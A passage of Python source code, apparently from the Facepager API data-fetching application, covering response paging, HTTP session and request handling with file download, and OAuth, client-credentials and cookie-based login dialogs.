elif (options.get('paging_type') == "decrease"):
node = getDictValueOrNone(options, 'lastdata.response', dump=False)
cursor = getDictValueOrNone(node, options.get('key_paging'))
if (node is not None):
if cursor is None:
return None
try:
cursor = int(cursor) - 1
options['params'][options['param_paging']] = cursor
except:
return None
# break if "continue pagination" is checked and data already present
elif options.get('resume',False):
offcut = getDictValueOrNone(options, 'lastdata.response', dump=False)
# Don't fetch if already finished (= offcut)
if (offcut is not None):
return None
return options
def updatePagingOptions(self, data, options):
# Stop if result is empty
if (options['nodedata'] is not None) and not hasValue(data, options['nodedata']):
return None
# paging by auto count
if (options.get('paging_type') == "count") and (options.get('param_paging') is not None):
offset = options['params'][options['param_paging']]
offset = offset + options.get('offset_step', 1)
options['params'][options['param_paging']] = offset
# paging by key
elif (options.get('paging_type') == "key") and (options.get('key_paging') is not None) and (
options.get('param_paging') is not None):
cursor = getDictValueOrNone(data, options['key_paging'])
if cursor is None:
return None
stopvalue = not extractValue(data, options.get('paging_stop'), dump=False, default=True)[1]
if stopvalue:
return None
options['params'][options['param_paging']] = cursor
# url based paging
elif (options.get('paging_type') == "url") and (options.get('key_paging') is not None):
url = getDictValueOrNone(data, options['key_paging'])
if url is not None:
url, params = self.parseURL(url)
options['params'] = params
options['url'] = url
else:
return None
elif (options.get('paging_type') == "decrease"):
# manual paging with max-id
# if there are still statuses in the response, use the last ID-1 for further pagination
if isinstance(data, list) and (len(data) > 0):
node = data[-1]
else:
node = data
cursor = getDictValueOrNone(node, options['key_paging'])
if cursor is None:
return None
try:
cursor = int(cursor) - 1
options['params'][options['param_paging']] = cursor
except:
return None
# no pagination
else:
return None
return options
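# Illustrative sketch for updatePagingOptions() above (hypothetical response):
# with paging_type='key', key_paging='paging.next' and param_paging='cursor',
# a response such as
#
#   data = {'items': [...], 'paging': {'next': 'abc123'}}
#
# leads to options['params']['cursor'] = 'abc123' for the next request; None is
# returned (paging stops) when the key is missing, the stop key evaluates to
# false, or the extracted node data is empty.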
def buildUrl(self, nodedata, options, logProgress=None):
if not ('url' in options):
urlpath = options["basepath"].strip() + options['resource'].strip() + options.get('extension', '')
urlparams = {}
urlparams.update(options['params'])
urlpath, urlparams, templateparams = self.getURL(urlpath, urlparams, nodedata, options)
requestheaders = options.get('headers', {})
# Authorization
if options.get('auth','disable') != 'disable':
token = options.get('auth_prefix','') + options.get('access_token','')
if options.get('auth') == 'param':
urlparams[options.get('auth_tokenname')] = token
elif (options.get('auth') == 'header'):
requestheaders[options.get('auth_tokenname')] = token
method = options.get('verb', 'GET')
payload = self.getPayload(options.get('payload', None), templateparams, nodedata, options, logProgress)
if isinstance(payload, MultipartEncoder) or isinstance(payload, MultipartEncoderMonitor):
requestheaders["Content-Type"] = payload.content_type
else:
method = options.get('verb', 'GET')
payload = None
urlpath = options['url']
urlparams = options['params']
requestheaders = {}
# sign request (for Amazon tab)
if hasattr(self, "signRequest"):
requestheaders = self.signRequest(urlpath, urlparams, requestheaders, method, payload, options)
return method, urlpath, urlparams, payload, requestheaders
def initSession(self, no=0, renew=False):
"""
Return existing session or create a new session if necessary
:param no: Session number
:return: session
"""
with self.lock_session:
while (len(self.sessions) <= no):
self.sessions.append(None)
session = self.sessions[no] if not renew else None
if session is None:
session = requests.Session()
session.proxies.update(self.getProxies())
# Mount new adapters = don't cache connections
adapter = requests.adapters.HTTPAdapter()
session.mount('http://', adapter)
session.mount('https://', adapter)
session.mount('file://', LocalFileAdapter())
self.sessions[no] = session
return session
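# Illustrative usage of initSession() above (added for clarity): one
# requests.Session per worker thread, lazily created and reused; renew=True
# replaces it with a fresh session, e.g. after a connection error.
#
#   session = self.initSession(no=0)               # create or reuse session 0
#   session = self.initSession(no=0, renew=True)   # force a new session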
def closeSession(self, no=0):
"""
Close the session
:param no: number of session
:return: None
"""
with self.lock_session:
if (len(self.sessions) > no) and (self.sessions[no] is not None):
self.sessions[no].close()
self.sessions[no] = None
def request(self, session_no=0, path=None, args=None, headers=None, method="GET", payload=None,foldername=None,
filename=None, fileext=None, format='json'):
"""
Perform a request using a thread-safe session
"""
def download(response,foldername=None,filename=None,fileext=None):
if foldername is not None and filename is not None:
if fileext is None:
contentype = response.headers.get("content-type")
if contentype is not None:
guessed_ext = guess_all_extensions(contentype)
fileext = guessed_ext[-1] if len(guessed_ext) > 0 else None
else:
fileext = None
fullfilename = makefilename(path,foldername, filename, fileext)
file = open(fullfilename, 'wb')
else:
fullfilename = None
file = None
# requests downloads the full body into memory unless stream=True is set.
# iter_content, text and content all fall back to previously downloaded content,
# so there is no need to download the data into a string object a second time.
try:
content = io.BytesIO()
try:
for chunk in response.iter_content(1024):
content.write(chunk)
if file is not None:
file.write(chunk)
out = content.getvalue()
encoding = cchardet.detect(out)['encoding']
encoding = 'utf-8' if encoding is None else encoding
out = out.decode(encoding)
except Exception as e:
out = str(e)
finally:
content.close()
finally:
if file is not None:
file.close()
# if file is not None:
# try:
# for chunk in response.iter_content(1024):
# file.write(chunk)
# finally:
# file.close()
return (fullfilename, out)
#Throttle speed
if (self.speed is not None) and (self.lastrequest is not None):
pause = ((60 * 1000) / float(self.speed)) - self.lastrequest.msecsTo(QDateTime.currentDateTime())
while (self.connected) and (pause > 0):
time.sleep(0.1)
pause = ((60 * 1000) / float(self.speed)) - self.lastrequest.msecsTo(QDateTime.currentDateTime())
self.lastrequest = QDateTime.currentDateTime()
if session_no is None:
session_no = 0
self.closeSession(session_no)
session = self.initSession(session_no)
try:
response = None
try:
maxretries = 3
while True:
try:
if (not session):
raise Exception("No session available.")
# Pass cookies via the cookie jar instead of the header so they persist across redirects
cookies = headers.pop('Cookie', None) if headers is not None else None
if cookies is not None:
cookies = dict(item.split("=",maxsplit=1) for item in cookies.split(";"))
# Send request
response = session.request(method,path, params=args, headers=headers, cookies=cookies,
data=payload, timeout=self.timeout,stream=True,verify=True) # verify=False
except (HTTPError, ConnectionError) as e:
maxretries -= 1
# Try next request with new session
if (maxretries > 0) and (self.connected):
time.sleep(0.1)
session = self.initSession(session_no, True)
self.logMessage("Automatic retry: Request Error: {0}".format(str(e)))
else:
raise e
else:
break
if int(response.headers.get('content-length',0)) > (self.maxsize * 1024 * 1024):
raise DataTooBigError(f"File is too big, content length is {response.headers['content-length']}.")
status = 'fetched' if response.ok else 'error'
status = status + ' (' + str(response.status_code) + ')'
headers = dict(list(response.headers.items()))
# Download data
data = {
'content-type': response.headers.get("content-type",""),
'sourcepath': path,'sourcequery': args,'finalurl': response.url
}
fullfilename, content = download(response, foldername, filename, fileext)
if fullfilename is not None:
data['filename'] = os.path.basename(fullfilename)
data['filepath'] = fullfilename
# Text
if format == 'text':
data['text'] = content # str(response.text)
# Scrape links
elif format == 'links':
try:
links, base = extractLinks(content, response.url)
data['links'] = links
data['base'] = base
except Exception as e:
data['error'] = 'Could not extract Links.'
data['message'] = str(e)
data['response'] = content
# JSON
elif format == 'json':
try:
data = json.loads(content) if content != '' else []
except Exception as e:
# self.logMessage("No valid JSON data, try to convert XML to JSON ("+str(e)+")")
# try:
# data = xmlToJson(response.text)
# except:
data = {
'error': 'Data could not be converted to JSON',
'response': content,
'exception':str(e)
}
# JSON
elif format == 'xml':
try:
data = xmlToJson(content)
except Exception as e:
data = {
'error': 'Data could not be converted to JSON',
'response': content,
'exception':str(e)
}
except Exception as e:
#except (DataTooBigError, HTTPError, ReadTimeout, ConnectionError, InvalidURL, MissingSchema) as e:
status = 'request error'
data = {'error':str(e)}
headers = {}
#raise Exception("Request Error: {0}".format(str(e)))
finally:
if response is not None:
response.close()
return data, headers, status
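# Illustrative sketch for request() above (hypothetical endpoint and token):
# a minimal GET request through the thread-safe session handling; data is the
# parsed JSON (or an error dict), headers the response headers, and status a
# string such as 'fetched (200)'.
#
#   data, headers, status = self.request(
#       session_no=0,
#       path="https://api.example.com/items",
#       args={'limit': '10'},
#       headers={'Authorization': 'Bearer abc123'},
#       method="GET",
#       format='json')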
def disconnectSocket(self):
"""Used to hardly disconnect the streaming client"""
self.connected = False
while (len(self.sessions) > 0):
session = self.sessions.pop()
session.close()
#self.response.raw._fp.close()
#self.response.close()
@Slot()
def captureData(self, nodedata, options=None, logData=None, logMessage=None, logProgress=None):
session_no = options.get('threadnumber',0)
self.connected = True
# Init pagination
options = self.initPagingOptions(nodedata, options)
if options is None:
return False
# file settings
foldername, filename, fileext = self.getFileFolderName(options, nodedata)
format = options.get('format', 'json')
if format == 'file':
if (foldername is None) or (not os.path.isdir(foldername)):
raise Exception("Folder does not exists, select download folder, please!")
# build url
method, urlpath, urlparams, payload, requestheaders = self.buildUrl(nodedata, options, logProgress)
if not urlpath:
logMessage("Empty path, node {0} skipped.".format(nodedata['objectid']))
return False
if not urlpath.startswith(('https://','http://','file://')):
logMessage("Http or https missing in path, node {0} skipped.".format(nodedata['objectid']))
return False
if options['logrequests']:
logpath = self.getLogURL(urlpath,urlparams,options)
logMessage("Capturing data for {0} from {1}".format(nodedata['objectid'], logpath))
# Show browser
self.browserWindow = BrowserDialog(self.mainWindow, "Browser", 800, 600)
self.browserWindow.logMessage.connect(logMessage)
self.browserWindow.activateCaptureButton(logData)
url = urlpath + '?' + urllib.parse.urlencode(urlparams)
self.browserWindow.loadPage(url, requestheaders, options, foldername, filename, fileext)
# for data, headers, status in self.browserWindow.capturePage(
# session_no,urlpath, urlparams, requestheaders, method, payload,
# foldername, filename, fileext, format=format, strip):
# options['querytime'] = str(datetime.now())
# options['querystatus'] = status
# logData(data, options, headers)
return True
@Slot()
def loadFinished(self, success):
if (not success and not self.loginWindow.stopped):
self.logMessage('Error loading web page')
def selectFolder(self):
datadir = self.folderEdit.text()
datadir = os.path.dirname(self.mainWindow.settings.value('lastpath', '')) if datadir == '' else datadir
datadir = os.path.expanduser('~') if datadir == '' else datadir
dlg = SelectFolderDialog(self, 'Select Upload Folder', datadir)
if dlg.exec_():
if dlg.optionNodes.isChecked():
newnodes = [os.path.basename(f) for f in dlg.selectedFiles()]
self.mainWindow.tree.treemodel.addSeedNodes(newnodes)
folder = os.path.dirname(dlg.selectedFiles()[0])
self.folderEdit.setText(folder)
else:
folder = dlg.selectedFiles()[0]
self.folderEdit.setText(folder)
def selectDownloadFolder(self):
datadir = self.downloadfolderEdit.text()
datadir = os.path.dirname(self.mainWindow.settings.value('lastpath', '')) if datadir == '' else datadir
datadir = os.path.expanduser('~') if datadir == '' else datadir
dlg = SelectFolderDialog(self, 'Select Download Folder', datadir)
if dlg.exec_():
if dlg.optionNodes.isChecked():
newnodes = [os.path.basename(f) for f in dlg.selectedFiles()]
self.mainWindow.tree.treemodel.addSeedNodes(newnodes)
folder = os.path.dirname(dlg.selectedFiles()[0])
self.downloadfolderEdit.setText(folder)
else:
folder = dlg.selectedFiles()[0]
self.downloadfolderEdit.setText(folder)
def getGlobalOptions(self):
# Get global options
settings = {}
settings['nodelevel'] = self.mainWindow.levelEdit.value()
settings['excludetypes'] = self.mainWindow.typesEdit.text()
settings['threads'] = self.mainWindow.threadsEdit.value()
settings['speed'] = self.mainWindow.speedEdit.value()
settings['errors'] = self.mainWindow.errorEdit.value()
settings['expand'] = self.mainWindow.autoexpandCheckbox.isChecked()
settings['logrequests'] = self.mainWindow.logCheckbox.isChecked()
settings['saveheaders'] = self.mainWindow.headersCheckbox.isChecked()
settings['fulloffcut'] = self.mainWindow.offcutCheckbox.isChecked()
settings['timeout'] = self.mainWindow.timeoutEdit.value()
settings['maxsize'] = self.mainWindow.maxsizeEdit.value()
settings['allnodes'] = self.mainWindow.allnodesCheckbox.isChecked()
settings['resume'] = self.mainWindow.resumeCheckbox.isChecked()
settings['emptyonly'] = self.mainWindow.emptyCheckbox.isChecked()
return settings
def setGlobalOptions(self, settings):
value = settings.get('nodelevel', None) # default None
if value is not None:
self.mainWindow.levelEdit.setValue(int(value))
value = settings.get('excludetypes', None) # default None
if value is not None:
self.mainWindow.typesEdit.setText(str(value))
value = settings.get('threads', None) # default None
if value is not None:
self.mainWindow.threadsEdit.setValue(int(value))
value = settings.get('speed') # default 200
if value is not None:
self.mainWindow.speedEdit.setValue(int(value))
value = settings.get('errors', None) # default None
if value is not None:
self.mainWindow.errorEdit.setValue(int(value))
value = settings.get('expand', None) # default None
if value is not None:
self.mainWindow.autoexpandCheckbox.setChecked(bool(value))
value = settings.get('saveheaders', None) # default None
if value is not None:
self.mainWindow.headersCheckbox.setChecked(bool(value))
value = settings.get('fulloffcut', None) # default None
if value is not None:
self.mainWindow.offcutCheckbox.setChecked(bool(value))
value = settings.get('timeout') # default 15
if value is not None:
self.mainWindow.timeoutEdit.setValue(int(value))
value = settings.get('maxsize') # default 5
if value is not None:
self.mainWindow.maxsizeEdit.setValue(int(value))
value = settings.get('logrequests', None) # default None
if value is not None:
self.mainWindow.logCheckbox.setChecked(bool(value))
value = settings.get('allnodes', None) # default None
if value is not None:
self.mainWindow.allnodesCheckbox.setChecked(bool(value))
value = settings.get('resume', None) # default None
if value is not None:
self.mainWindow.resumeCheckbox.setChecked(bool(value))
value = settings.get('emptyonly', None) # default None
if value is not None:
self.mainWindow.emptyCheckbox.setChecked(bool(value))
class AuthTab(ApiTab):
"""
Module providing authorization
- init input fields
- login windows
- open authorization support
"""
# see YoutubeTab for keys in the options-parameter
def __init__(self, mainWindow=None, name='NoName'):
super(AuthTab, self).__init__(mainWindow, name)
self.loginServerInstance = None
self.defaults['login_buttoncaption'] = " Login "
self.defaults['login_window_caption'] = "Login Page"
self.defaults['auth_type'] = "Disable"
def cleanup(self):
if self.loginServerInstance is not None:
self.loginServerInstance.shutdown()
def initAuthSetupInputs(self):
authlayout = QFormLayout()
authlayout.setContentsMargins(0, 0, 0, 0)
self.authWidget.setLayout(authlayout)
self.authTypeEdit = QComboBox()
self.authTypeEdit.addItems(['Disable','API key','OAuth2', 'Cookie', 'OAuth2 Client Credentials'])
authlayout.addRow("Authentication type", self.authTypeEdit)
self.authURIEdit = QLineEdit()
authlayout.addRow("Login URI", self.authURIEdit)
self.redirectURIEdit = QLineEdit()
authlayout.addRow("Redirect URI", self.redirectURIEdit)
self.tokenURIEdit = QLineEdit()
authlayout.addRow("Token URI", self.tokenURIEdit)
self.clientIdEdit = QLineEdit()
self.clientIdEdit.setEchoMode(QLineEdit.Password)
authlayout.addRow("Client Id", self.clientIdEdit)
self.clientSecretEdit = QLineEdit()
self.clientSecretEdit.setEchoMode(QLineEdit.Password)
authlayout.addRow("Client Secret", self.clientSecretEdit)
self.scopeEdit = QLineEdit()
authlayout.addRow("Scopes", self.scopeEdit)
self.proxyEdit = QLineEdit()
self.proxyEdit.setToolTip(wraptip("The proxy will be used for fetching data only, not for the login procedure."))
authlayout.addRow("Proxy", self.proxyEdit)
@Slot()
def editAuthSettings(self):
dialog = QDialog(self,Qt.WindowSystemMenuHint | Qt.WindowTitleHint)
dialog.setWindowTitle("Authentication settings")
dialog.setMinimumWidth(400)
layout = QVBoxLayout()
layout.addWidget(self.authWidget)
buttons = QDialogButtonBox(QDialogButtonBox.Ok | QDialogButtonBox.Cancel)
layout.addWidget(buttons)
dialog.setLayout(layout)
def close():
dialog.close()
def apply():
# Auth type: 'Disable','API key','OAuth2', 'OAuth2 Client Credentials','Cookie'
try:
if self.authTypeEdit.currentText() == 'Disable':
self.authEdit.setCurrentIndex(self.authEdit.findText('disable'))
self.tokenNameEdit.setText('')
elif self.authTypeEdit.currentText() == 'API key':
pass
elif self.authTypeEdit.currentText() == 'OAuth2':
self.authEdit.setCurrentIndex(self.authEdit.findText('header'))
self.tokenNameEdit.setText('Authorization')
elif self.authTypeEdit.currentText() == 'OAuth2 Client Credentials':
self.authEdit.setCurrentIndex(self.authEdit.findText('header'))
self.tokenNameEdit.setText('Authorization')
elif self.authTypeEdit.currentText() == 'Cookie':
self.authEdit.setCurrentIndex(self.authEdit.findText('header'))
self.tokenNameEdit.setText('Cookie')
except AttributeError:
pass
dialog.close()
#connect the nested functions above to the dialog-buttons
buttons.accepted.connect(apply)
buttons.rejected.connect(close)
dialog.exec_()
def initLoginInputs(self, toggle=True):
# token and login button
loginlayout = QHBoxLayout()
if toggle:
self.authEdit = QComboBox(self)
self.authEdit.addItems(['disable', 'param', 'header'])
self.authEdit.setToolTip(wraptip(
"Disable: no authorization. Param: an access_token parameter containing the access token will be added to the query. Header: a header containing the access token will be sent."))
loginlayout.addWidget(self.authEdit)
loginlayout.addWidget(QLabel("Name"))
self.tokenNameEdit = QLineEdit()
            self.tokenNameEdit.setToolTip(wraptip("The name of the access token parameter or the authorization header. If you select an authentication method other than API key (e.g. OAuth2 or Cookie), the name is overridden by the selected method."))
# If you leave this empty, the default value is 'access_token' for param-method and 'Authorization' for header-method.
loginlayout.addWidget(self.tokenNameEdit,1)
rowcaption = "Authorization"
loginlayout.addWidget(QLabel("Access token"))
else:
rowcaption = "Access token"
self.tokenEdit = QLineEdit()
self.tokenEdit.setEchoMode(QLineEdit.Password)
loginlayout.addWidget(self.tokenEdit,2)
self.authButton = QPushButton('Settings', self)
self.authButton.clicked.connect(self.editAuthSettings)
loginlayout.addWidget(self.authButton)
self.loginButton = QPushButton(self.defaults.get('login_buttoncaption', "Login"), self)
self.loginButton.setToolTip(wraptip(
"Sometimes you need to register your own app at the platform of the API provider. Adjust the settings and login,"))
self.loginButton.clicked.connect(self.doLogin)
loginlayout.addWidget(self.loginButton)
#self.mainLayout.addRow(rowcaption, loginwidget)
self.extraLayout.addRow(rowcaption, loginlayout)
def getSettings(self, purpose='fetch'): # purpose = 'fetch'|'settings'|'preset'
options = super(AuthTab, self).getSettings(purpose)
defaults = self.getDefaultAndDocOptions()
# Auth type
try:
options['auth_type'] = self.authTypeEdit.currentText().strip() if self.authTypeEdit.currentText() != "" else defaults.get('auth_type', '')
except AttributeError:
options['auth_type'] = defaults.get('auth_type', '')
# OAUTH URIs
try:
options[
'auth_uri'] = self.authURIEdit.text().strip() if self.authURIEdit.text() != "" else defaults.get(
'auth_uri', '')
options[
'redirect_uri'] = self.redirectURIEdit.text().strip() if self.redirectURIEdit.text() != "" else defaults.get(
'redirect_uri', '')
options[
'token_uri'] = self.tokenURIEdit.text().strip() if self.tokenURIEdit.text() != "" else defaults.get(
'token_uri', '')
except AttributeError:
options['auth_uri'] = defaults.get('auth_uri', '')
options['redirect_uri'] = defaults.get('redirect_uri', '')
options['token_uri'] = defaults.get('token_uri', '')
try:
options['auth'] = self.authEdit.currentText().strip() \
if self.authEdit.currentText() != "" \
else defaults.get('auth', 'disable')
options['auth_tokenname'] = self.tokenNameEdit.text()
except AttributeError:
options.pop('auth_tokenname',None)
options['auth'] = defaults.get('auth', 'disable')
# Override authorization settings (token handling)
# based on authentication settings
if options.get('auth_type') == 'OAuth2':
#options['auth'] = 'header'
options['auth_prefix'] = "Bearer "
#options['auth_tokenname'] = "Authorization"
elif options.get('auth_type') == 'OAuth2 Client Credentials':
#options['auth'] = 'header'
options['auth_prefix'] = "Bearer "
#options['auth_tokenname'] = "Authorization"
elif options.get('auth_type') == 'OAuth1':
#options['auth'] = 'disable' # managed by Twitter module
options['auth_prefix'] = ''
#options['auth_tokenname'] = ''
elif options.get('auth_type') == 'Cookie':
#options['auth'] = 'header'
options['auth_prefix'] = ''
#options['auth_tokenname'] = 'Cookie'
if options['auth'] == 'disable':
options['auth_prefix'] = ''
options['auth_tokenname'] = ''
return options
# Transfer options to GUI
def setSettings(self, settings = {}):
settings = super(AuthTab, self).setSettings(settings)
# Merge options
options = self.getDefaultAndDocOptions(settings)
# Legacy types
if options.get('auth_type') == 'Twitter OAuth1':
options['auth_type'] = 'OAuth1'
if options.get('auth_type') == 'Twitter App-only':
options['auth_type'] = 'OAuth2 Client Credentials'
# Override defaults
if options.get('auth_type') == 'OAuth2':
options['auth'] = 'header'
options['auth_prefix'] = "Bearer "
options['auth_tokenname'] = "Authorization"
elif options.get('auth_type') == 'OAuth2 Client Credentials':
options['auth'] = 'header'
options['auth_prefix'] = "Bearer "
options['auth_tokenname'] = "Authorization"
elif options.get('auth_type') == 'OAuth1':
options['auth'] = 'disable' # managed by Twitter module
options['auth_prefix'] = ''
options['auth_tokenname'] = ''
elif options.get('auth_type') == 'Cookie':
options['auth'] = 'header'
options['auth_prefix'] = ''
options['auth_tokenname'] = 'Cookie'
try:
self.authTypeEdit.setCurrentIndex( \
self.authTypeEdit.findText(options.get('auth_type', 'Disable')))
self.authURIEdit.setText(options.get('auth_uri'))
self.redirectURIEdit.setText(options.get('redirect_uri'))
self.tokenURIEdit.setText(options.get('token_uri'))
except AttributeError:
pass
try:
self.authEdit.setCurrentIndex(self.authEdit.findText(options.get('auth', 'disable')))
self.tokenNameEdit.setText(options.get('auth_tokenname'))
except AttributeError:
pass
return options
def fetchData(self, nodedata, options=None, logData=None, logMessage=None, logProgress=None):
# Preconditions
if not self.auth_userauthorized and self.auth_preregistered:
            raise Exception('You are not authorized, please log in!')
session_no = options.get('threadnumber',0)
self.closeSession(session_no)
self.connected = True
self.speed = options.get('speed', None)
self.timeout = options.get('timeout', 15)
self.maxsize = options.get('maxsize', 5)
# Init pagination
options = self.initPagingOptions(nodedata, options)
if options is None:
return False
# file settings
foldername, filename, fileext = self.getFileFolderName(options, nodedata)
format = options.get('format', 'json')
if format == 'file':
if (foldername is None) or (not os.path.isdir(foldername)):
raise Exception("Folder does not exists, select download folder, please!")
# Abort condition: maximum page count
for page in range(options.get('currentpage', 0), options.get('pages', 1)):
# Save page
options['currentpage'] = page
# build url
method, urlpath, urlparams, payload, requestheaders = self.buildUrl(nodedata, options, logProgress)
if not urlpath:
logMessage("Empty path, node {0} skipped.".format(nodedata['objectid']))
return False
if not urlpath.startswith(('https://','http://','file://')):
logMessage("Http or https missing in path, node {0} skipped.".format(nodedata['objectid']))
return False
if options['logrequests']:
logpath = self.getLogURL(urlpath,urlparams,options)
logMessage("Fetching data for {0} from {1}".format(nodedata['objectid'], logpath))
# data
options['querytime'] = str(datetime.now())
data, headers, status = self.request(session_no,urlpath, urlparams, requestheaders, method, payload,
foldername, filename, fileext, format=format)
# status handling
options['querystatus'] = status
options['ratelimit'] = (status == "error (429)")
# return data
logData(data, options, headers)
# rate limit info
# if 'x-rate-limit-remaining' in headers:
# options['info'] = {'x-rate-limit-remaining': u"{} requests remaining until rate limit".format(headers['x-rate-limit-remaining'])}
# Progress
if logProgress is not None:
logProgress({'page': page + 1})
# Paging
options = self.updatePagingOptions(data, options)
if options is None:
break
if not self.connected:
break
return True
@Slot()
def doLogin(self, session_no = 0):
"""
Show login window
:param session_no: the number of the session used for login
:return:
"""
self.closeSession(session_no)
options = self.getSettings()
if options['auth_type'] == 'OAuth2 Client Credentials':
self.doTwitterAppLogin(session_no)
elif options['auth_type'] == 'OAuth1':
self.doOAuth1Login(session_no)
elif options['auth_type'] == 'Cookie':
self.doCookieLogin(session_no)
elif options['auth_type'] == 'API key':
QMessageBox.information(self, "Facepager", "Manually enter your API key into the access token field or change the authentication method in the settings.")
elif options['auth_type'] == 'Disable':
QMessageBox.information(self, "Login disabled","No authentication method selected. Please choose a method in the settings.", QMessageBox.StandardButton.Ok)
elif options['auth_type'] == 'OAuth2 External':
self.doOAuth2ExternalLogin(session_no)
else:
self.doOAuth2Login(session_no)
@Slot()
def doOAuth1Login(self, session_no = 0):
try:
# use credentials from input if provided
clientid = self.getClientId()
if clientid is None:
return False
service = self.getOAuth1Service()
self.oauthdata.pop('oauth_verifier', None)
self.oauthdata['requesttoken'], self.oauthdata[
'requesttoken_secret'] = service.get_request_token()
self.showLoginWindow(self.defaults.get('login_window_caption', 'Login'),
service.get_authorize_url(self.oauthdata['requesttoken']),
self.defaults.get('login_window_width', 600),
self.defaults.get('login_window_height', 600)
)
except Exception as e:
QMessageBox.critical(self, "Login canceled",
str(e),
QMessageBox.StandardButton.Ok)
@Slot()
def doOAuth2Login(self, session_no=0):
try:
options = self.getSettings()
# use credentials from input if provided
clientid = self.getClientId()
if clientid is None:
return False
scope = self.scopeEdit.text() if self.scopeEdit.text() != "" else self.defaults.get('scope', None)
loginurl = options.get('auth_uri', '')
if loginurl == '':
raise Exception('Login URL is missing, please adjust settings!')
if clientid == '':
raise Exception('Client Id is missing, please adjust settings!')
params = {'client_id': clientid,
'redirect_uri': options['redirect_uri'],
'response_type': options.get('response_type', 'code')}
if scope is not None:
params['scope'] = scope
#params = '&'.join('%s=%s' % (key, value) for key, value in iter(params.items()))
#url = loginurl + "?" + params
urlpath, urlparams, templateparams = self.getURL(loginurl,params,{},{})
url = urlpath + '?' + urllib.parse.urlencode(urlparams)
self.showLoginWindow(self.defaults.get('login_window_caption', 'Login'),
url,
self.defaults.get('login_window_width', 600),
self.defaults.get('login_window_height', 600)
)
except Exception as e:
QMessageBox.critical(self, "Login canceled",
str(e),
QMessageBox.StandardButton.Ok)
@Slot()
def doOAuth2ExternalLogin(self, session_no=0):
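        # External OAuth2 flow: start a local HTTP server as the redirect target and open
        # the provider's login page in the system browser instead of an embedded web view.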
try:
options = self.getSettings()
# use credentials from input if provided
clientid = self.getClientId()
if clientid is None:
return False
scope = self.scopeEdit.text() if self.scopeEdit.text() != "" else self.defaults.get('scope', None)
loginurl = options.get('auth_uri', '')
if loginurl == '':
raise Exception('Login URL is missing, please adjust settings!')
if clientid == '':
raise Exception('Client Id is missing, please adjust settings!')
self.startLoginServer(0)
redirect_uri = "http://localhost:"+str(self.loginServerInstance.server_port)
params = {'client_id': clientid,
'redirect_uri': redirect_uri,
'response_type': options.get('response_type', 'code')}
if scope is not None:
params['scope'] = scope
params = '&'.join('%s=%s' % (key, value) for key, value in iter(params.items()))
url = loginurl + "?" + params
webbrowser.open(url)
except Exception as e:
QMessageBox.critical(self, "Login canceled",
str(e),
QMessageBox.StandardButton.Ok)
@Slot()
def doCookieLogin(self, session_no=0):
def newCookie(domain, cookie):
self.tokenEdit.setText(cookie)
# print("Domain: "+domain+". Cookie: "+cookie)
try:
options = self.getSettings()
url= options.get('auth_uri', '')
if url == '':
raise Exception('Login URL is missing, please adjust settings!')
self.loginWindow = BrowserDialog(
self.mainWindow,
self.defaults.get('login_window_caption', 'Login'),
self.defaults.get('login_window_width', 600),
self.defaults.get('login_window_height', 600)
)
self.loginWindow.logMessage.connect(self.logMessage)
self.loginWindow.activateCookieButton(newCookie)
self.loginWindow.loadPage(url)
except Exception as e:
QMessageBox.critical(self, "Login canceled",
str(e),
QMessageBox.StandardButton.Ok)
@Slot()
def doTwitterAppLogin(self, session_no=0):
try:
# See https://developer.twitter.com/en/docs/basics/authentication/overview/application-only
self.auth_preregistered = False
clientid = self.clientIdEdit.text() # no defaults
if clientid == '':
raise Exception('Client Id is missing, please adjust settings!')
clientsecret = self.clientSecretEdit.text() # no defaults
if clientsecret == '':
raise Exception('Client Secret is missing, please adjust settings!')
options = self.getSettings()
path= options.get('auth_uri', '')
if path == '':
raise Exception('Login URL is missing, please adjust settings!')
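            # App-only flow: encode consumer key/secret as HTTP Basic auth and exchange
            # them at the token endpoint for a bearer token (grant_type=client_credentials).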
basicauth = urllib.parse.quote_plus(clientid) + ':' + urllib.parse.quote_plus(clientsecret)
basicauth = base64.b64encode(basicauth.encode('utf-8')).decode('utf-8')
payload = 'grant_type=client_credentials'
headers = {'Authorization': 'Basic ' + basicauth,
'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8'}
data, headers, status = self.request(None, path, payload=payload, headers=headers, method="POST")
token = data.get('access_token', '')
self.tokenEdit.setText(token)
try:
self.tokensecretEdit.setText('')
except AttributeError:
pass
if token != '':
QMessageBox.information(self, "Login", "Login succeeded, got new access token.",
QMessageBox.StandardButton.Ok)
else:
raise Exception("Check your settings, no token could be retrieved.")
except Exception as e:
QMessageBox.critical(self, "Login failed",
str(e),
QMessageBox.StandardButton.Ok)
@Slot()
def showLoginWindow(self, caption='', url='',width=600,height=600):
"""
Create a SSL-capable WebView for the login-process
Uses a Custom QT-Webpage Implementation
Supply a onLoginWindowChanged-Slot to fetch the API-Token
"""
self.loginWindow = QMainWindow(self.mainWindow)
self.loginWindow.setAttribute(Qt.WA_DeleteOnClose)
self.loginWindow.resize(width, height)
self.loginWindow.setWindowTitle(caption)
self.loginWindow.stopped = False
self.loginWindow.cookie = ''
#create WebView with Facebook log-Dialog, OpenSSL needed
self.loginStatus = self.loginWindow.statusBar()
self.login_webview = QWebEngineView(self.loginWindow)
self.loginWindow.setCentralWidget(self.login_webview)
# Use the custom- WebPage class
webpage = WebPageCustom(self.login_webview)
webpage.logMessage.connect(self.logMessage)
self.login_webview.setPage(webpage)
#Connect to the onLoginWindowChanged-method
self.login_webview.urlChanged.connect(self.onLoginWindowChanged)
webpage.urlNotFound.connect(self.onLoginWindowChanged) #catch redirects to localhost or nonexistent uris
# Connect to the loadFinished-Slot for an error message
self.login_webview.loadFinished.connect(self.loadFinished)
self.login_webview.load(QUrl(url))
self.login_webview.show()
self.loginWindow.show()
@Slot()
def closeLoginWindow(self):
if self.loginWindow is None:
return False
self.loginWindow.stopped = True
self.login_webview.stop()
self.loginWindow.close()
self.loginWindow = None
@Slot()
def onLoginWindowChanged(self, url=False):
options = self.getSettings()
if options['auth_type'] == 'OAuth2 Client Credentials':
return False
elif options['auth_type'] == 'OAuth1':
url = self.login_webview.url().toString()
success = self.getOAuth1Token(url)
if success:
self.closeLoginWindow()
else:
url = url.toString()
options = self.getSettings()
if url.startswith(options['redirect_uri']):
if self.getOAuth2Token(url):
self.closeLoginWindow()
@Slot()
def startLoginServer(self, port):
self.stopLoginServer()
os.environ['OAUTHLIB_INSECURE_TRANSPORT'] = '1'
self.loginServerInstance = LoginServer(port, self.onLoginServerRedirect)
self.loginServerThread = threading.Thread(target=self.loginServerInstance.serve_forever)
self.loginServerThread.start()
port = self.loginServerInstance.server_port
self.defaults['redirect_uri'] = 'http://localhost:%d' % port
